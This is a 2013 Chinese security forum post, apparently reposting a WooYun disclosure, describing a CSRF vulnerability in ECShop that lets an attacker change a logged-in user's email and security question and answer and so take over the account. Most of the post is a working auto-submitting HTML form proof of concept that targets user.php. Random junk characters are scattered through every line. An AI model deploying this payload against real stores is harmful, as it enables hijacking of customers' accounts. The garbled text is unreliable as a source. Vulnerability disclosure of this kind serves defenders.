找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2084|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:
* U- i  U8 F; d6 \& |; P1 qecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现9 x9 l) y8 p5 b! N" Y: x# T6 [

; w5 f2 c2 Y; Z. U- KDemo For:http://www.wooyun.org/bug.php?action=view&id=395+ n7 N1 o3 s6 J

) s' ~' P/ [4 E- V1 S详细说明:
2 `- g: K) ?& [- Y' Y0 _1 n% w利用csrf和xss可以突破官方所说的“障碍”' r: g- F( x: ^  c) j. Q  l
xss版本已经有人说明. F8 u) o% N6 u
这里给出csrf版本
5 x+ c  L1 m6 N1 _4 @0 a0 T
* e+ `: H( o6 C1 f漏洞证明:
; x3 N6 C& j( n" _<html>6 `0 V  _6 b& y1 L0 q) [- f
<body>
5 u4 @0 h' [% W% L; C, i; C<form action="http://www.wooyun.org/ecshop/user.php" method="POST">  c  z& Q& ^( Y7 M
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
; [5 a" z, r; L' g* s  v$ P' ]: F2 {: u# J<INPUT TYPE="text" NAME="act" value="act_edit_profile">5 L, b# I5 Q3 }3 O
<INPUT TYPE="text" NAME="sel_question" value="ecshop">
' S. ^7 W9 ]  l* r9 b7 O$ `+ X<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
. g9 ]0 U6 \, f2 W% v</body>% i& {- F- i: i9 x
<script>
* z  F; s, X' x4 {9 edocument.forms[0].submit();
: P' w/ M( L8 _' Q( e- U</script>
! Z; |2 Z2 V; t' f</html>: _, s  I# h& @
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
2 ~8 q( Y8 Y. A# l) D
0 ?: Z1 l: b1 [  R/ \
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表